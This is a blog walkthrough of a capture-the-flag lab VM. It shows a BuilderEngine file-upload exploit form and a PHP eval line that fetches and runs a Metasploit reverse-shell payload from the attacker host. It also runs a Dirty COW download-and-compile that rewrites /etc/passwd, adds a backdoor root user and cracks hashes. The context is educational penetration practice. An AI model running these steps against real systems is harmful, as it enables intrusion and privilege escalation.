CTF Sedna from Viper (hackfest 2016)

Hi everyone, I did the first Vuln VM from hackfest 2016 not long ago and i want to try this one now. It’s the second one by @ViperBlackSkull and it is the second walkthrough for me so if you need more information you can reach me on twitter at @marghost. You can get the virtual machine HERE. So lets get started.

First of all let’s make a quick nmap and a nikto. i had already made those so i will just copy my note file. (Always open a notepad when you are hacking it is the best advice i can give to you)

80
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting…
+ OSVDB-3092: /system/: This might be interesting…
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.

8080
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method (‘Allow’ Header): ‘PUT’ method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method (‘Allow’ Header): ‘DELETE’ may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
[/code]

Ok so here we see many things. First of all we have two web server, one samba server that can maybe be exploited, also a rpc server that may be used for unbound connection to the server and of course an ssh.

I tried first to find an exploit for the rpc server but i had no luck, metasploit had exploit to ddos or crash it, and other exploits required nfs. I turn myself to the web servers. The 80 one have a robot file that is no use. I skip to the 8080 and tried to poke around tomcat, need to be auth to use main exploit and the default username:password did not work. I tried to bruteforce the password with the tomcat_mgr_login auxiliary scan from metasploit and noting to be found.

So i put my attention into the 80 server there is noting interesting into the /files/ directory. The system and user directories are locked down… The readme of icon directory is noting but usefull. I found someting interesting into the license.txt the site use builderengine. A quick google search pointed out that i can exploit this to send a reverse php shell.

So first of all need to create the builderengine.php file that will send malicious code into the /files/ directory of the remote server.

[code language=”php”]
<!– # Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0 # Date: 18/09/2016 # Exploit Author: metanubix # Vendor Homepage: http://builderengine.org/ # Software Link: http://builderengine.org/page-cms-download.html # Version: 3.5.0 # Tested on: Kali Linux 2.0 64 bit # Google Dork: intext:"BuilderEngine Ltd. All Right Reserved" 1) Unauthenticated Unrestricted File Upload: POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ Vulnerable Parameter: files[] We can upload test.php and reach the file via the following link: /files/test.php –>
<html>
<body>
<form method="post" action="http://192.168.1.16/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>

</body>
</html>
[/code]

After that start php server and open the builderengine.php that you just created.

[code language=”text”]php -S 127.0.0.1:80[/code]

Start metasploit and insert the right commands to start a web_delivery exploit

[code language=”text”]use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.14
set payload php/meterpreter/reverse_tcp
run[/code]

When you will run the exploit it will give you an adress, just create a remotexploit.php file and fill it like this :

[code language=”php”]<?php
eval(file_get_contents(‘http://192.168.1.14:8080/9HL33yWdUR4KFo’));
?>[/code]

Now use the delivery form to upload this little php gift from metasploit. Then you will be prompted by metasploit to open a session

[code language=”text”]sessions -i 1[/code]

[code language=”text”]python -c ‘import pty; pty.spawn("/bin/bash")'[/code]

Done i have a shell! First win.

A quick view tell me that this linux kernel is vulnerable to the Dirty Dirty Cow exploit

[code language=”text”]www-data@Sedna:/var/www$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux [/code]

Sooo exploiting dirty cow

[code language=”bash”]curl https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c

<githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4805 100 4805 0 0 29333 0 –:–:– –:–:– –:–:– 29478
www-data@Sedna:/var/www/html/files$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@Sedna:/var/www/html/files$ ./dirty
./dirty
Please enter the new password: test
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: b77cc000
ptrace 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON’T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: b77cc000
madvise 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.
DON’T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
192.168.1.16 – Meterpreter session 1 closed. Reason: Died[/code]

When exploited, ruuuun to ssh and login as fast as you can. You are on the edge as dirty cow is unstable as FU** and can cause a kernel panic anytime. To make it stable you need to enter a line of code.

[code language=”bash”]echo 0 > /proc/sys/vm/dirty_writeback_centisecs[/code]

It should look like this :

[code language=”bash”]root@kali:~# ssh [email protected]
[email protected]’s password:
Added user firefart.

Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Mon Mar 20 08:25:24 EDT 2017

System load: 0.15 Memory usage: 2% Processes: 57
Usage of /: 29.7% of 7.26GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126
firefart@Sedna:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
firefart@Sedna:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Sedna:~# adduser pwned
Adding user `pwned’ …
Adding new group `pwned’ (1001) …
Adding new user `pwned’ (1001) with group `pwned’ …
Creating home directory `/home/pwned’ …
Copying files from `/etc/skel’ …
no talloc stackframe at ../source3/param/loadparm.c:4864, leaking memory
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for pwned
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
firefart@Sedna:~# usermod -aG sudo pwned[/code]

As you can see here the line of code is pushed right after the ssh login and i make a root user right after just in case something goes wrong.

I am groot! It’s another win :p

Now we go fishing for flags. Found the two first flags the easy way by making a search as root :

[code]
firefart@Sedna:/# find . -name "flag.txt"
./var/www/flag.txt
./root/flag.txt
firefart@Sedna:/# cat /var/www/flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
firefart@Sedna:/# cat /root/flag.txt
a10828bee17db751de4b936614558305
firefart@Sedna:/#
[/code]

Ok now i need to find the two post exploit flags. My first reflex was to go and investigate the /files/users/ directory of the 80 server…
this was a dead end. Next ting to snoop in was the tomcat install that i was not able to login even if i tried to bruteforce the password.

so a little google search pointed me that tomcat passwords are inside ‘/etc/tomcat7/tomcat-users.xml’

This is what i found

[code language=”xml”]<role rolename="manager-gui"/>
<user username="tomcat" password="submitthisforpoints" roles="manager-gui"/>
</tomcat-users>[/code]

Looks like i found a flag!

Now it is time to login into the tomcat server. Noting to be found there.

I snooped a little more around. noting to see from running process (ps -aux | less).

No special cron was used. (/etc/crontab)

I found it!!! an user named crackmeforpoints is inside the user list (cut -d: -f1 /etc/passwd)
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::

so i will try to john my way to this password over night… almost done!

[code language=”bash”]root@kali:~/Downloads# john ./crack.password.db</pre>
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "–format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press ‘q’ or Ctrl-C to abort, almost any other key for status[/code]

Ok after a night John the crazy didn’t crack the password so it is a little more complex that I as expected. I got the flag and the job is done for me :). Have a nice day and I will send you in the next walkthrough.

Leave a Reply Cancel reply